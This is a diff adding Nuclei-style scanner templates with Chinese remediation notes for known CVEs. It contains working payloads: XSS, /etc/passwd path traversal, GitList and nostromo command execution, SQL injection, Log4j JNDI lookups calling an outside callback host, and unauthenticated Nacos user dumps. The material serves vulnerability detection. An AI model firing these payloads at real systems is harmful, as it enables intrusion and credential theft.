+ 8X8 Docker Jitsi Meet是美国8x8(8X8)公司的一款用于在Docker构建Jitsi Meet视频会议解决方案的工具。
+
+ Jitsi Meet 2.7版本至2.8.3版本存在跨站脚本漏洞,该漏洞源于sessionprivi .php模块
+ reference:
+ - /~https://github.com/udima-university/moodle-mod_jitsi/issues/67
+ - https://nvd.nist.gov/vuln/detail/cve-2021-26812
+ severity: medium
+ classification:
+ cve-id:
+ - cve-2021-26812
+ cwe-id:
+ - cwe-79
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ remediation: |
+ 官方修复方案:
+ 1、建议用户到官方获取最新补丁或者最新版本程序:/~https://github.com/udima-university/moodle-mod_jitsi/issues/67
+
+ 临时修复方案:
+ 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。'
+ ```
+requests:
+- matchers:
+ - type: word
+ part: body
+ words:
+ - alert(document.domain);
+ - type: status
+ status:
+ - 200
+ - type: word
+ part: header
+ words:
+ - MoodleSession
+ matchers-condition: and
+ path:
+ - '{{BaseURL}}/mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2F{{Hostname}}%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1'
+ method: GET
diff --git a/config/51pwn/yaml/jnoj/CVE-2019-17538.yaml b/config/51pwn/yaml/jnoj/CVE-2019-17538.yaml
new file mode 100755
index 000000000..ad1c0479d
--- /dev/null
+++ b/config/51pwn/yaml/jnoj/CVE-2019-17538.yaml
@@ -0,0 +1,50 @@
+id: CVE-2019-17538
+info:
+ name: Jnoj arbitrary local file inclusion (LFI)
+ author:
+ - pussycat0x
+ tags:
+ - cve
+ - cve2019
+ - jnoj
+ - lfi
+ description: |-
+ Jiangnan Online Judge 路径遍历漏洞
+ Jiangnan Online Judge是一套用于计算机编程的在线评测系统。该系统主要用于对用户提交的源代码进行编译和执行,并检验程序源代码的正确性。
+
+ Jiangnan Online Judge 0.8.0版本中存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。
+ reference:
+ - /~https://github.com/shi-yang/jnoj/issues/53
+ severity: high
+ classification:
+ cve-id:
+ - cve-2019-17538
+ cwe-id:
+ - cwe-22
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ remediation: |-
+ 官方修复方案:
+ 1、建议用户到官方获取最新补丁或者最新版本程序:https://www.jnoj.org
+
+ 临时修复方案:
+ 1、过滤\".\",使用户在url中不能回溯上级目录。
+ 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。
+ 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。
+ 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。
+ 5、用户下载文件之前进行权限校验。
+requests:
+- matchers:
+ - type: status
+ status:
+ - 200
+ - type: regex
+ part: body
+ regex:
+ - 'root:.*:0:0:'
+ matchers-condition: and
+ raw:
+ - |
+ GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
diff --git a/config/51pwn/yaml/klaussilveira GitList /CVE-2018-1000533.yaml b/config/51pwn/yaml/klaussilveira GitList /CVE-2018-1000533.yaml
new file mode 100755
index 000000000..4438ada2c
--- /dev/null
+++ b/config/51pwn/yaml/klaussilveira GitList /CVE-2018-1000533.yaml
@@ -0,0 +1,59 @@
+id: CVE-2018-1000533
+info:
+ name: GitList < 0.6.0 Remote Code Execution
+ author:
+ - pikpikcu
+ tags:
+ - rce
+ - git
+ - cve
+ - cve2018
+ - gitlist
+ description: |-
+ GitList远程代码执行漏洞
+ klaussilveira GitList 是一个使用 PHP 语言编写的具有图形化界面的Git存储库查看器,它支持与多个Git存储库进行交互、支持使用浏览器查看存储库。
+ klaussilveira GitList 0.6 及之前版本中的‘searchTree’函数存在安全漏洞,该漏洞源于程序将未正确的过滤的输入传入到‘system’函数。攻击者可利用该漏洞以PHP用户身份执行任意代码。
+ reference:
+ - /~https://github.com/vulhub/vulhub/tree/master/gitlist/cve-2018-1000533
+ - https://nvd.nist.gov/vuln/detail/cve-2018-1000533
+ - https://security.szurek.pl/exploit-bypass-php-escapeshellarg-escapeshellcmd.html
+ - /~https://github.com/klaussilveira/gitlist/commit/87b8c26b023c3fc37f0796b14bb13710f397b322
+ severity: critical
+ classification:
+ cve-id:
+ - cve-2018-1000533
+ cwe-id:
+ - cwe-20
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ remediation: |
+ 官方修复方案:
+ 1、建议用户到官方获取最新补丁或者最新版本程序:/~https://github.com/klaussilveira/gitlist/commit/87b8c26b023c3fc37f0796b14bb13710f397b322
+
+ 临时修复方案:
+ 1、在执行涉及到可以将字符串作为代码执行的函数时,需要严格验证用户传递的参数,同时尽量避免用户控制参数。
+ 2、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。
+requests:
+- matchers:
+ - type: word
+ part: body
+ words:
+ - root:/root:/bin/bash
+ extractors:
+ - name: path
+ type: regex
+ regex:
+ - (.*?)
+ group: 1
+ part: body
+ internal: true
+ raw:
+ - |
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+ - |
+ POST /{{path}}/tree/a/search HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ query=--open-files-in-pager=cat%20/etc/passwd
diff --git a/config/51pwn/yaml/kylin/CVE-2020-13937.yaml b/config/51pwn/yaml/kylin/CVE-2020-13937.yaml
new file mode 100755
index 000000000..d7ad7e784
--- /dev/null
+++ b/config/51pwn/yaml/kylin/CVE-2020-13937.yaml
@@ -0,0 +1,38 @@
+id: CVE-2020-13937
+info:
+ name: Apache Kylin Exposed Configuration File
+ author:
+ - pikpikcu
+ description: "Apache Kylin API 未授权访问漏洞\t\t\nApache Kylin™是一个开源的、分布式的分析型数据仓库。近日Apache
+ Kylin官方修复 CVE-2020-13937 API未授权访问漏洞。攻击者可构造恶意请求,访问API地址,可以获取Apache Kylin的相关配置信息,从而导致身份凭证等信息泄漏。阿里云应急响应中心提醒
+ Apache Kylin 用户尽快采取安全措施阻止漏洞攻击。"
+ severity: medium
+ remediation: |-
+ **官方修复方案:**
+ 官方已经修复该漏洞,请在链接地址下载最新版本https://kylin.apache.org/download/
+
+ **临时修复方案:**
+ 1、API禁止直接暴漏在互联网,需通过VPN等较为安全的接入方式访问内部系统。
+ 2、API所有页面开启身份认证,根据情况选择对应方式(认证用户,用户名密码)。
+ 3、限制IP访问,绑定固定的IP访问后台管理系统。
+requests:
+- matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ part: header
+ words:
+ - application/json
+ - type: word
+ condition: and
+ part: body
+ words:
+ - config
+ - kylin.metadata.url
+ matchers-condition: and
+ path:
+ - '{{BaseURL}}/kylin/api/admin/config'
+ method: GET
+ headers:
+ Content-Type: application/json
diff --git a/config/51pwn/yaml/lighttpd/CVE-2014-2323.yaml b/config/51pwn/yaml/lighttpd/CVE-2014-2323.yaml
new file mode 100755
index 000000000..73fa62151
--- /dev/null
+++ b/config/51pwn/yaml/lighttpd/CVE-2014-2323.yaml
@@ -0,0 +1,26 @@
+id: CVE-2014-2323
+info:
+ name: Lighttpd 1.4.34 SQL Injection and Path Traversal
+ author:
+ - l0ne1y
+ description: |-
+ lighttpd SQL注入漏洞
+ lighttpd是德国软件开发者Jan Kneschke所研发的一款开源的Web服务器,它的主要特点是仅需少量的内存及CPU资源即可达到同类网页服务器的性能。
+
+ lighttpd 1.4.34及之前版本中的mod_mysql_vhost.c文件存在SQL注入漏洞。远程攻击者可借助特制的主机名利用该漏洞执行任意SQL命令
+ severity: critical
+ remediation: |-
+ 官方修复方案: 1、升级系统至无漏洞版本,或于官网下载安全补丁
+ http://www.lighttpd.net/2014/3/12/1.4.35/
+ 临时修复方案: 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。
+requests:
+- matchers:
+ - type: regex
+ regex:
+ - 'root:[x*]:0:0:'
+ raw:
+ - |+
+ GET /etc/passwd HTTP/1.1
+ Host: [::1]' UNION SELECT '/
+
+ unsafe: true
diff --git a/config/51pwn/yaml/log4j/CVE-2021-44228.yaml b/config/51pwn/yaml/log4j/CVE-2021-44228.yaml
new file mode 100755
index 000000000..6963c3352
--- /dev/null
+++ b/config/51pwn/yaml/log4j/CVE-2021-44228.yaml
@@ -0,0 +1,77 @@
+id: CVE-2021-44228
+info:
+ name: Apache Log4j2 Remote Code Injection
+ author:
+ - l0ne1y
+ description: |-
+ Apache Log4j2 远程代码执行漏洞
+ Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。
+
+ Apache Log4J 存在代码问题漏洞,攻击者可设计一个数据请求发送给使用 Apache Log4j工具的服务器,当该请求被打印成日志时就会触发远程代码执行。
+ severity: critical
+ remediation: |-
+ **官方修复方案**
+ 目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
+ https://logging.apache.org/log4j/2.x/security.html
+
+ **临时修复方案**
+ 1.建议JDK使用6u211、7u201、8u191、11.0.1及以上的版本;
+ 2.添加jvm启动参数:-Dlog4j2.formatMsgNoLookups=true;
+ 3.添加log4j2.component.properties配置文件,增加如下内容为:
+ log4j2.formatMsgNoLookups=true;
+ 4.系统环境变量中将FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS设置为true;
+ 5.禁止安装log4j的服务器访问外网,并在边界对dnslog相关域名访问进行检测。
+ 6.凡检测到包含“${jndi:ldap:”的关键字,直接阻断访问流量
+ 7.使用如下官方临时补丁进行修复/~https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc1
+ 8.在攻击过程中可能使用 DNSLog 进行漏洞探测,建议可以通过流量监测设备监控是否有相关 DNSLog 域名的请求。
+requests:
+- matchers:
+ - type: word
+ part: interactsh_protocol
+ words:
+ - dns
+ - type: regex
+ part: interactsh_request
+ regex:
+ - ([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+
+ extractors:
+ - type: kval
+ kval:
+ - interactsh_ip
+ - type: regex
+ regex:
+ - ([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+
+ group: 2
+ part: interactsh_request
+ - type: regex
+ regex:
+ - ([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+
+ group: 1
+ part: interactsh_request
+ matchers-condition: and
+ raw:
+ - |
+ GET /?x=${jndi:ldap://${hostName}.uri.{{interactsh-url}}/a} HTTP/1.1
+ Host: {{Hostname}}
+ - |
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+ Accept: ${jndi:ldap://${hostName}.accept.{{interactsh-url}}}
+ Accept-Encoding: ${jndi:ldap://${hostName}.acceptencoding.{{interactsh-url}}}
+ Accept-Language: ${jndi:ldap://${hostName}.acceptlanguage.{{interactsh-url}}}
+ Access-Control-Request-Headers: ${jndi:ldap://${hostName}.accesscontrolrequestheaders.{{interactsh-url}}}
+ Access-Control-Request-Method: ${jndi:ldap://${hostName}.accesscontrolrequestmethod.{{interactsh-url}}}
+ Authentication: Basic ${jndi:ldap://${hostName}.authenticationbasic.{{interactsh-url}}}
+ Authentication: Bearer ${jndi:ldap://${hostName}.authenticationbearer.{{interactsh-url}}}
+ Cookie: ${jndi:ldap://${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${hostName}.cookievalue.{{interactsh-url}}}
+ Location: ${jndi:ldap://${hostName}.location.{{interactsh-url}}}
+ Origin: ${jndi:ldap://${hostName}.origin.{{interactsh-url}}}
+ Referer: ${jndi:ldap://${hostName}.referer.{{interactsh-url}}}
+ Upgrade-Insecure-Requests: ${jndi:ldap://${hostName}.upgradeinsecurerequests.{{interactsh-url}}}
+ User-Agent: ${jndi:ldap://${hostName}.useragent.{{interactsh-url}}}
+ X-Api-Version: ${jndi:ldap://${hostName}.xapiversion.{{interactsh-url}}}
+ X-CSRF-Token: ${jndi:ldap://${hostName}.xcsrftoken.{{interactsh-url}}}
+ X-Druid-Comment: ${jndi:ldap://${hostName}.xdruidcomment.{{interactsh-url}}}
+ X-Forwarded-For: ${jndi:ldap://${hostName}.xforwardedfor.{{interactsh-url}}}
+ X-Origin: ${jndi:ldap://${hostName}.xorigin.{{interactsh-url}}}
+ stop-at-first-match: true
diff --git a/config/51pwn/yaml/log4j/CVE-2021-45046.yaml b/config/51pwn/yaml/log4j/CVE-2021-45046.yaml
new file mode 100755
index 000000000..8017c7463
--- /dev/null
+++ b/config/51pwn/yaml/log4j/CVE-2021-45046.yaml
@@ -0,0 +1,57 @@
+id: CVE-2021-45046
+info:
+ name: Apache Log4j2 Remote Code Injection
+ author:
+ - l0ne1y
+ description: |-
+ Apache Log4j2 Lookup 代码执行与拒绝服务漏洞
+ 发现Apache Log4j 2.15.0中针对CVE-2021-44228的修复在某些非默认配置中不完整。当日志配置使用带有上下文查找的非默认模式布局(例如,$${ctx:loginId})时,控制线程上下文映射 (MDC) 输入数据的攻击者可以使用 JNDI 查找模式制作恶意输入数据,导致部分环境信息泄露和远程代码执行。
+ severity: critical
+ remediation: |-
+ **官方修复方案**
+ 目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
+ https://logging.apache.org/log4j/2.x/security.html。
+requests:
+- matchers:
+ - type: word
+ part: interactsh_protocol
+ words:
+ - dns
+ - type: regex
+ part: interactsh_request
+ regex:
+ - ([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+
+ extractors:
+ - type: regex
+ regex:
+ - ([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+
+ group: 2
+ part: interactsh_request
+ - type: regex
+ regex:
+ - ([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+
+ group: 1
+ part: interactsh_request
+ matchers-condition: and
+ raw:
+ - |
+ GET /?x=${jndi:ldap://127.0.0.1#.${hostName}.{{interactsh-url}}/a} HTTP/1.1
+ Host: {{Hostname}}
+ Accept: ${jndi:ldap://127.0.0.1#.${hostName}.accept.{{interactsh-url}}}
+ Accept-Encoding: ${jndi:ldap://127.0.0.1#.${hostName}.acceptencoding.{{interactsh-url}}}
+ Accept-Language: ${jndi:ldap://127.0.0.1#.${hostName}.acceptlanguage.{{interactsh-url}}}
+ Access-Control-Request-Headers: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestheaders.{{interactsh-url}}}
+ Access-Control-Request-Method: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestmethod.{{interactsh-url}}}
+ Authentication: Basic ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbasic.{{interactsh-url}}}
+ Authentication: Bearer ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbearer.{{interactsh-url}}}
+ Cookie: ${jndi:ldap://127.0.0.1#.${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${hostName}.cookievalue.{{interactsh-url}}}
+ Location: ${jndi:ldap://127.0.0.1#.${hostName}.location.{{interactsh-url}}}
+ Origin: ${jndi:ldap://127.0.0.1#.${hostName}.origin.{{interactsh-url}}}
+ Referer: ${jndi:ldap://127.0.0.1#.${hostName}.referer.{{interactsh-url}}}
+ Upgrade-Insecure-Requests: ${jndi:ldap://127.0.0.1#.${hostName}.upgradeinsecurerequests.{{interactsh-url}}}
+ User-Agent: ${jndi:ldap://127.0.0.1#.${hostName}.useragent.{{interactsh-url}}}
+ X-Api-Version: ${jndi:ldap://127.0.0.1#.${hostName}.xapiversion.{{interactsh-url}}}
+ X-CSRF-Token: ${jndi:ldap://127.0.0.1#.${hostName}.xcsrftoken.{{interactsh-url}}}
+ X-Druid-Comment: ${jndi:ldap://127.0.0.1#.${hostName}.xdruidcomment.{{interactsh-url}}}
+ X-Forwarded-For: ${jndi:ldap://127.0.0.1#.${hostName}.xforwardedfor.{{interactsh-url}}}
+ X-Origin: ${jndi:ldap://127.0.0.1#.${hostName}.xorigin.{{interactsh-url}}}
diff --git a/config/51pwn/yaml/mongoshake/alibaba-mongoshake-unauth.yaml b/config/51pwn/yaml/mongoshake/alibaba-mongoshake-unauth.yaml
new file mode 100755
index 000000000..889928880
--- /dev/null
+++ b/config/51pwn/yaml/mongoshake/alibaba-mongoshake-unauth.yaml
@@ -0,0 +1,33 @@
+id: alibaba-mongoshake-unauth
+info:
+ name: Alibaba Mongoshake Unauth
+ author:
+ - l0ne1y
+ description: |-
+ Alibaba Mongoshake 未授权访问漏洞
+ MongoShake是阿里云以Golang语言编写的通用平台型服务工具,MongoShake存在未授权访问漏洞,攻击者可利用该漏洞获取敏感信息。
+ severity: medium
+ remediation: |-
+ 官方修复方案:
+ 1、建议用户到官方获取最新补丁或者最新版本程序:
+ /~https://github.com/alibaba/MongoShake
+
+ 临时修复方案:
+ 1、对漏洞接口开启身份认证,根据情况选择对应方式(认证用户,用户名密码)。
+ 2、限制IP访问,绑定固定的IP访问后台管理系统。
+requests:
+- matchers:
+ - type: word
+ words:
+ - '{"Uri":"/worker","Method":"GET"}'
+ - type: word
+ part: header
+ words:
+ - text/plain
+ - type: status
+ status:
+ - 200
+ matchers-condition: and
+ path:
+ - '{{BaseURL}}/'
+ method: GET
diff --git a/config/51pwn/yaml/nacos/CVE-2021-29442.yaml b/config/51pwn/yaml/nacos/CVE-2021-29442.yaml
new file mode 100755
index 000000000..c1480f06f
--- /dev/null
+++ b/config/51pwn/yaml/nacos/CVE-2021-29442.yaml
@@ -0,0 +1,36 @@
+id: CVE-2021-29442
+info:
+ name: Nacos prior to 1.4.1 Missing Authentication Check
+ author:
+ - l0ne1y
+ description: |-
+ Alibaba nacos 访问控制错误漏洞
+ nacos是中国阿里巴巴(Alibaba)的一个动态服务发现、配置和服务管理平台。该软件支持基于 DNS 和基于 RPC 的服务发现,可提供提供实时健康检查,阻止服务向不健康的主机或服务实例发送请求等功能。
+
+ Nacos 存在访问控制错误漏洞,该漏洞源于ConfigOpsController允许用户执行管理操作,比如查询数据库,甚至清除数据库。
+ severity: high
+ remediation: |-
+ 官方修复方案:
+ 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
+ /~https://github.com/advisories/GHSA-36hp-jr8h-556f
+
+ 临时修复方案:
+ 1、调用功能前验证用户是否有权限调用相关功能。
+ 2、对功能模块进行严格的权限验证,如非必要建议不对互联网开放或进行网络层的访问控制。
+requests:
+- matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ part: header
+ words:
+ - application/json
+ - type: regex
+ part: body
+ regex:
+ - '"TABLENAME":"(?:(?:(?:(?:(?:APP_CONFIGDATA_RELATION_[PS]UB|SYS(?:(?:CONGLOMERAT|ALIAS|(?:FI|RO)L)E|(?:(?:ROUTINE)?|COL)PERM|(?:FOREIGN)?KEY|CONSTRAINT|T(?:ABLEPERM|RIGGER)|S(?:TAT(?:EMENT|ISTIC)|EQUENCE|CHEMA)|DEPEND|CHECK|VIEW|USER)|USER|ROLE)S|CONFIG_(?:TAGS_RELATION|INFO_(?:AGGR|BETA|TAG))|TENANT_CAPACITY|GROUP_CAPACITY|PERMISSIONS|SYSCOLUMNS|SYS(?:DUMMY1|TABLES)|APP_LIST)|CONFIG_INFO)|TENANT_INFO)|HIS_CONFIG_INFO)"'
+ matchers-condition: and
+ path:
+ - '{{BaseURL}}/nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st'
+ method: GET
diff --git a/config/51pwn/yaml/nacos/unauthenticated-nacos-access.yaml b/config/51pwn/yaml/nacos/unauthenticated-nacos-access.yaml
new file mode 100755
index 000000000..0fccf685d
--- /dev/null
+++ b/config/51pwn/yaml/nacos/unauthenticated-nacos-access.yaml
@@ -0,0 +1,37 @@
+id: unauthenticated-nacos-access
+info:
+ name: Nacos 1.x - Authentication Bypass
+ author:
+ - l0ne1y
+ description: |-
+ Alibaba nacos 使用欺骗进行的认证绕过
+ 当配置为使用身份验证(-Dnacos.core.auth.enabled=true)时,Nacos 使用 AuthFilter servlet 过滤器来强制执行身份验证。这个过滤器有一个后门,可以让 Nacos 服务器绕过这个过滤器,从而跳过身份验证检查。
+ severity: high
+ remediation: |-
+ 官方修复建议
+ 升级nacos版本至2.0.3以上,https://nacos.io/zh-cn/
+
+ 临时修复建议:
+ 修改配置文件,令"-Dnacos.core.auth.enabled=false"
+requests:
+- matchers:
+ - type: word
+ part: header
+ words:
+ - 'Content-Type: application/json'
+ - type: regex
+ condition: and
+ part: body
+ regex:
+ - '"username":'
+ - '"password":'
+ - type: status
+ status:
+ - 200
+ matchers-condition: and
+ path:
+ - '{{BaseURL}}/nacos/v1/auth/users?pageNo=1&pageSize=9'
+ - '{{BaseURL}}/v1/auth/users?pageNo=1&pageSize=9'
+ method: GET
+ headers:
+ User-Agent: Nacos-Server
diff --git a/config/51pwn/yaml/nifi/ApacheNifi-Api-UnauthorizedAccess.yaml b/config/51pwn/yaml/nifi/ApacheNifi-Api-UnauthorizedAccess.yaml
new file mode 100755
index 000000000..de4b506d3
--- /dev/null
+++ b/config/51pwn/yaml/nifi/ApacheNifi-Api-UnauthorizedAccess.yaml
@@ -0,0 +1,33 @@
+id: ApacheNifi-Api-UnauthorizedAccess
+info:
+ name: Apache Nifi API未授权访问漏洞
+ author:
+ - l0ne1y
+ description: |-
+ Apache Nifi API未授权访问漏洞
+ Apache NiFi是美国阿帕奇(Apache)软件基金会的一套数据处理和分发系统。该系统主要用于数据路由、转换和系统中介逻辑。 Apache NiFi 1.0.0版本至1.11.4版本存在访问控制错误漏洞。该漏洞源于网络系统或产品未正确限制来自未授权角色的资源访问。
+ severity: high
+ remediation: |-
+ **官方修复方案:**
+ 官方已经修复该漏洞,请在链接地址下载最新版本https://nifi.apache.org/download.html
+
+ **临时修复方案:**
+ 1、API禁止直接暴漏在互联网,需通过VPN等较为安全的接入方式访问内部系统。
+ 2、API所有页面开启身份认证,根据情况选择对应方式(认证用户,用户名密码)。
+ 3、限制IP访问,绑定固定的IP访问后台管理系统。
+requests:
+- matchers:
+ - type: word
+ words:
+ - '"identity":"anonymous","anonymous":true"'
+ - type: word
+ part: header
+ words:
+ - json
+ - type: status
+ status:
+ - 200
+ matchers-condition: and
+ path:
+ - '{{BaseURL}}/nifi-api/flow/current-user'
+ method: GET
diff --git a/config/51pwn/yaml/nostromo nhttpd/CVE-2019-16278.yaml b/config/51pwn/yaml/nostromo nhttpd/CVE-2019-16278.yaml
new file mode 100755
index 000000000..e67f81dfd
--- /dev/null
+++ b/config/51pwn/yaml/nostromo nhttpd/CVE-2019-16278.yaml
@@ -0,0 +1,29 @@
+id: CVE-2019-16278
+info:
+ name: nostromo 1.9.6 - Remote Code Execution
+ author:
+ - l0ne1y
+ description: |-
+ Nostromo nhttpd 路径遍历导致远程代码执行漏洞
+ nostromo nhttpd是一款开源的Web服务器。
+
+ nostromo nhttpd 1.9.6及之前版本中的‘http_verify’函数存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。
+ severity: critical
+ remediation: "官方修复方案:\n1、建议用户到官方获取最新补丁或者最新版本程序:http://www.nazgul.ch\n\n临时修复方案:\n1、系统开发阶段的防御,在系统开发阶段应充分考虑系统的安全性,对目录遍历漏洞来说,需对用户提交的内容进行严格的过滤,这里主要指过滤目录跳转符,字符截断符,dir命令等。\n2、系统运行阶段的防御,系统运维人员需有强烈的安全意识,他们的一举一动都会影响用户的个人隐私信息安全。对系统运维人员来说,部署新的业务系统或者安装新的软件或应用后应通过web扫描工具积极查找系统是否存在目录遍历漏洞,尽可能不要在服务器上安装与业务不相关的第三方软件以避免引入目录遍历漏洞。除此之外,还应该合理配置web服务器(禁止目录浏览,分配好目录权限等)并积极关注所使用的各种软件和应用的版本发布情况,及时升级新的软件版本。'\n3、服务器配置,为更好的保护系统安全,实际生产环境和测试开发环境应该隔离。在生产环境中的任何改动,都需要严格遵循变更管理流程,做到执行人、执行时间、执行对象和具体改动均记录在案,并有企业信息安全部门进行事前审核和事后审计。技术人员一般不要直接调试生产系统,可以在测试环境中调试完成后再更新生产系统,以避免调试过程中开启某些接口、更改某些配置或者保存某些调试信息造成安全隐患。如果非要在线调试生产系统,而且需要保存调试信息时,应避免将调试信息直接保存到服务器本地,同时调试完成后应第一时间删除相关调试信息并恢复系统配置。\n
+ \ 1)IIS:打开 IIS 管理器,然后导航至您要管理的级别;在“功能视图”中,双击“目录浏览”;在“操作”窗格中,选择“目录浏览”功能,单击“禁用”。\n
+ \ 2)Nginx:找到Nginx配置文件中的“autoindex”,设置为“off”,然后重启Nginx。\n 3)Apache:修配置文件httpd.conf,把:Options
+ Indexes FollowSymLinks 改为:Options -Indexes FollowSymLinks ,然后重启Apache。\n 4)Tomcat:在应用的WEB-INF目录找到web.xml配置文件,将“listings”参数的初始化值设置为“false”,然后重启Tomcat。
+ \ \n4、安全设备的防御,进行目录遍历攻击时,攻击者基本都会使用目录跳转符,同时可能配合使用字符截断符,dir命令等。对专业的安全设备来说通过检测特定语法下的目录跳转符,字符截断符,以及与查看目录相关的命令即可识别各种目录遍历攻击。部署专业的安全设备不仅可以很好的保护业务系统自身的目录遍历漏洞,同时还能防御web服务器和服务器上其他非业务相关的第三方应用漏洞引发的目录遍历攻击。"
+requests:
+- matchers:
+ - type: word
+ words:
+ - 8sas2sd223x8rv
+ raw:
+ - |
+ POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1
+ Host: {{Hostname}}
+
+ echo
+ echo
+ echo 8sas2sd223x8rv 2>&1
diff --git a/config/51pwn/yaml/ntopng/CVE-2021-28073.yaml b/config/51pwn/yaml/ntopng/CVE-2021-28073.yaml
new file mode 100755
index 000000000..3650cc878
--- /dev/null
+++ b/config/51pwn/yaml/ntopng/CVE-2021-28073.yaml
@@ -0,0 +1,35 @@
+id: CVE-2021-28073
+info:
+ name: Ntopng Authentication Bypass
+ author:
+ - z3bd
+ description: |-
+ Ntopng 身份绕过
+ ntopng是一种计算机软件,用于监视计算机网络上的流量。它旨在成为ntop的高性能,低资源替代品。该名称源自ntop下一代。ntopng是根据GNU通用公共许可证发布的开源软件。
+ ntopng存在身份验证绕过漏洞,攻击者可凭此漏洞进入后台。
+ severity: critical
+ remediation: |-
+ 官方修复方案: 1、升级系统至无漏洞版本,或于官网下载安全补丁。
+ https://www.ntop.org/
+
+ 临时修复方案: 1、前后端同时对用户输入信息进行校验,双重验证机制。 2、调用功能前验证用户是否有权限调用相关功能。 3、直接对象引用的加密资源ID,防止攻击者枚举ID,敏感数据特殊化处理。 4、采用成熟的权限管理框架,如spring security。 5、用户进行访问操作的凭证(如用户ID、产品号码、订单流水号等)优先采用在服务端关联session或加密后放在session中的方式获取。 6、必须采用表单或其他参数提交用户进行访问操作的凭证(如用户ID、产品号码、订单流水号等)时,应尽可能采用难以猜测的构造方式(增加字母及随机数字等)或采用复杂的加密算法加密后提交,应对客户端提交的凭证与会话的权限进行严格的验证,如提交的产品号码是否为隶属于登录用户的产品号码。 7、对管理功能模块进行严格的权限验证,如非必要建议不对互联网开放或进行网络层的访问控制。
+requests:
+- matchers:
+ - type: word
+ part: header
+ words:
+ - application/json
+ - type: word
+ condition: and
+ words:
+ - '"results":'
+ - '"name":'
+ - '"tab":'
+ - type: status
+ status:
+ - 200
+ matchers-condition: and
+ path:
